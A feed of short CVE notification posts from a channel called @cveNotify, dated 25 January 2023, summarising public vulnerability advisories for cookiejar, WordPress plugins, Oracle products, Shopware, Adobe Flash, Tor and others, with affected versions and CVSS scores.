🚨 CVE-2022-25901Versions of the package cookiejar before 2.1.4 are vulnerable to Regular Expression Denial of Service (ReDoS) via the Cookie.parse function, which uses an insecure regular expression.🎖@cveNotify |
|
| 2023-01-25 20:29:48 |
🚨 CVE-2023-0298Improper Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0.🎖@cveNotify |
|
| 2023-01-25 20:29:46 |
🚨 CVE-2020-36651A vulnerability has been found in youngerheart nodeserver and classified as critical. Affected by this vulnerability is an unknown functionality of the file nodeserver.js. The manipulation leads to path traversal. The name of the patch is c4c0f0138ab5afbac58e03915d446680421bde28. It is recommended to apply a patch to fix this issue. The identifier VDB-218461 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-25 20:29:42 |
🚨 CVE-2018-25077A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file lib/spintax.js. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.🎖@cveNotify |
|
| 2023-01-25 20:29:41 |
🚨 CVE-2015-10067A vulnerability was found in oznetmaster SSharpSmartThreadPool. It has been classified as problematic. This affects an unknown part of the file SSharpSmartThreadPool/SmartThreadPool.cs. The manipulation leads to race condition within a thread. The name of the patch is 0e58073c831093aad75e077962e9fb55cad0dc5f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218463.🎖@cveNotify |
|
| 2023-01-25 20:29:40 |
🚨 CVE-2023-22734Shopware is an open source commerce platform based on Symfony Framework and Vue js. The newsletter double opt-in validation was not checked properly, and it was possible to skip the complete double opt in process. As a result operators may have inconsistencies in their newsletter systems. This problem has been fixed with version 6.4.18.1. Users are advised to upgrade. Users unable to upgrade may find security measures are available via a plugin for major versions 6.1, 6.2, and 6.3. Users may also disable newsletter registration completely.🎖@cveNotify |
|
| 2023-01-25 20:29:39 |
🚨 CVE-2022-38469An unauthorized user with network access and the decryption key could decrypt sensitive data, such as usernames and passwords.🎖@cveNotify |
|
| 2023-01-25 20:29:38 |
🚨 CVE-2022-4295The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.🎖@cveNotify |
|
| 2023-01-25 18:29:44 |
🚨 CVE-2022-4486The Meteor Slides WordPress plugin through 1.5.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.🎖@cveNotify |
|
| 2023-01-25 18:29:43 |
🚨 CVE-2023-0305A vulnerability classified as critical was found in SourceCodester Online Food Ordering System. This vulnerability affects unknown code of the file admin_class.php of the component Login Module. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-218386 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-25 18:29:41 |
🚨 CVE-2022-23511A privilege escalation issue exists within the Amazon CloudWatch Agent for Windows, software for collecting metrics and logs from Amazon EC2 instances and on-premises servers, in versions up to and including v1.247354. When users trigger a repair of the Agent, a pop-up window opens with SYSTEM permissions. Users with administrative access to affected hosts may use this to create a new command prompt as NT AUTHORITY\SYSTEM. To trigger this issue, the third party must be able to access the affected host and elevate their privileges such that they're able to trigger the agent repair process. They must also be able to install the tools required to trigger the issue. This issue does not affect the CloudWatch Agent for macOS or Linux. Agent users should upgrade to version 1.247355 of the CloudWatch Agent to address this issue. There is no recommended work around. Affected users must update the installed version of the CloudWatch Agent to address this issue.🎖@cveNotify |
|
| 2023-01-25 18:29:40 |
🚨 CVE-2022-45440A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external storage media, such as a USB flash drive, and then logging into the FTP server on a vulnerable device.🎖@cveNotify |
|
| 2023-01-25 18:29:39 |
🚨 CVE-2022-38469An unauthorized user with network access and the decryption key could decrypt sensitive data, such as usernames and passwords.🎖@cveNotify |
|
| 2023-01-25 18:29:37 |
🚨 CVE-2023-21860Vulnerability in the MySQL Cluster product of Oracle MySQL (component: Cluster: Internal Operations). Supported versions that are affected are 7.4.38 and prior, 7.5.28 and prior, 7.6.24 and prior and 8.0.31 and prior. Difficult to exploit vulnerability allows high privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Cluster executes to compromise MySQL Cluster. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Cluster. CVSS 3.1 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-25 16:30:01 |
🚨 CVE-2023-21894Vulnerability in the Oracle Global Lifecycle Management NextGen OUI Framework product of Oracle Fusion Middleware (component: NextGen Installer issues). Supported versions that are affected are Prior to 13.9.4.2.11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Global Lifecycle Management NextGen OUI Framework executes to compromise Oracle Global Lifecycle Management NextGen OUI Framework. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Global Lifecycle Management NextGen OUI Framework. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-25 16:30:00 |
🚨 CVE-2023-21898Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: Applies to VirtualBox VMs running Windows 7 and later. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:59 |
🚨 CVE-2023-21899Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: Applies to VirtualBox VMs running Windows 7 and later. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:58 |
🚨 CVE-2023-21900Vulnerability in the Oracle Solaris product of Oracle Systems (component: NSSwitch). Supported versions that are affected are 10 and 11. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Oracle Solaris. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Solaris accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Solaris. CVSS 3.1 Base Score 4.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:L).🎖@cveNotify |
|
| 2023-01-25 16:29:57 |
🚨 CVE-2023-21893Vulnerability in the Oracle Data Provider for .NET component of Oracle Database Server. Supported versions that are affected are 19c and 21c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TCPS to compromise Oracle Data Provider for .NET. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Data Provider for .NET. Note: Applies also to Database client-only on Windows platform. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:56 |
🚨 CVE-2023-21891Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Visual Analyzer). Supported versions that are affected are 5.9.0.0.0 and 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:55 |
🚨 CVE-2023-21890Vulnerability in the Oracle Communications Converged Application Server product of Oracle Communications (component: Core). Supported versions that are affected are 7.1.0 and 8.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via UDP to compromise Oracle Communications Converged Application Server. Successful attacks of this vulnerability can result in takeover of Oracle Communications Converged Application Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:54 |
🚨 CVE-2023-21892Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Visual Analyzer). Supported versions that are affected are 5.9.0.0.0 and 6.4.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:53 |
🚨 CVE-2023-21888Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component: WebUI). Supported versions that are affected are 18.8.0-18.8.15, 19.12.0-19.12.15, 20.12.0-20.12.10 and 21.12.0-21.12.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Primavera Gateway, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Primavera Gateway accessible data as well as unauthorized read access to a subset of Primavera Gateway accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:52 |
🚨 CVE-2023-21889Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:50 |
🚨 CVE-2023-21884Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:49 |
🚨 CVE-2023-21885Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle VM VirtualBox accessible data. Note: Applies to Windows only. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:48 |
🚨 CVE-2023-21886Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.42 and prior to 7.0.6. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:47 |
🚨 CVE-2023-21887Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:46 |
🚨 CVE-2023-21882Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2023-01-25 16:29:42 |
🚨 CVE-2023-21883Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:41 |
🚨 CVE-2023-21880Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:40 |
🚨 CVE-2023-21881Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-01-25 16:29:39 |
🚨 CVE-2023-21858Vulnerability in the Oracle Collaborative Planning product of Oracle E-Business Suite (component: Installation). Supported versions that are affected are 12.2.3-12.2.12. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Collaborative Planning. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Collaborative Planning accessible data. CVSS 3.1 Base Score 7.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N).🎖@cveNotify |
|
| 2023-01-25 07:30:05 |
🚨 CVE-2023-22732Shopware is an open source commerce platform based on Symfony Framework and Vue js. The Administration session expiration was set to one week, when an attacker has stolen the session cookie they could use it for a long period of time. In version 6.4.18.1 an automatic logout into the Administration session has been added. As a result the user will be logged out when they are inactive. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-01-25 07:30:04 |
🚨 CVE-2016-4221Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:30:03 |
🚨 CVE-2023-22731Shopware is an open source commerce platform based on Symfony Framework and Vue js. In a Twig environment **without the Sandbox extension**, it is possible to refer to PHP functions in twig filters like `map`, `filter`, `sort`. This allows a template to call any global PHP function and thus execute arbitrary code. The attacker must have access to a Twig environment in order to exploit this vulnerability. This problem has been fixed with 6.4.18.1 with an override of the specified filters until the integration of the Sandbox extension has been finished. Users are advised to upgrade. Users of major versions 6.1, 6.2, and 6.3 may also receive this fix via a plugin.🎖@cveNotify |
|
| 2023-01-25 07:30:02 |
🚨 CVE-2016-4234Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:58 |
🚨 CVE-2016-4235Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:57 |
🚨 CVE-2016-4236Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:56 |
🚨 CVE-2016-4239Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:54 |
🚨 CVE-2016-4238Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:51 |
🚨 CVE-2023-22730Shopware is an open source commerce platform based on Symfony Framework and Vue js. In affected versions It was possible to put the same line item multiple times in the cart using the AP. The Cart Validators checked the line item's individuality and the user was able to bypass quantity limits in sales. This problem has been fixed with version 6.4.18.1. Users on major versions 6.1, 6.2, and 6.3 may also obtain this fix via a plugin.🎖@cveNotify |
|
| 2023-01-25 07:29:50 |
🚨 CVE-2016-4240Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:49 |
🚨 CVE-2016-4185Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:48 |
🚨 CVE-2016-4186Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:45 |
🚨 CVE-2015-10066A vulnerability was found in tynx wuersch and classified as critical. Affected by this issue is the function packValue/getByCustomQuery of the file backend/base/Store.class.php. The manipulation leads to sql injection. The name of the patch is 66d4718750a741d1053d327a79e285fd50372519. It is recommended to apply a patch to fix this issue. VDB-218462 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-25 07:29:44 |
🚨 CVE-2016-4189Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4190, CVE-2016-4217, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:43 |
🚨 CVE-2016-4217Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-4172, CVE-2016-4175, CVE-2016-4179, CVE-2016-4180, CVE-2016-4181, CVE-2016-4182, CVE-2016-4183, CVE-2016-4184, CVE-2016-4185, CVE-2016-4186, CVE-2016-4187, CVE-2016-4188, CVE-2016-4189, CVE-2016-4190, CVE-2016-4218, CVE-2016-4219, CVE-2016-4220, CVE-2016-4221, CVE-2016-4233, CVE-2016-4234, CVE-2016-4235, CVE-2016-4236, CVE-2016-4237, CVE-2016-4238, CVE-2016-4239, CVE-2016-4240, CVE-2016-4241, CVE-2016-4242, CVE-2016-4243, CVE-2016-4244, CVE-2016-4245, and CVE-2016-4246.🎖@cveNotify |
|
| 2023-01-25 07:29:42 |
🚨 CVE-2023-23637IMPatienT before 1.5.2 allows stored XSS via onmouseover in certain text fields within a PATCH /modify_onto request to the ontology builder. This may allow attackers to steal Protected Health Information.🎖@cveNotify |
|
| 2023-01-25 00:29:52 |
🚨 CVE-2023-23589The SafeSocks option in Tor before 0.4.7.13 has a logic error in which the unsafe SOCKS4 protocol can be used but not the safe SOCKS4a protocol, aka TROVE-2022-002.🎖@cveNotify |
|
| 2023-01-25 00:29:50 |
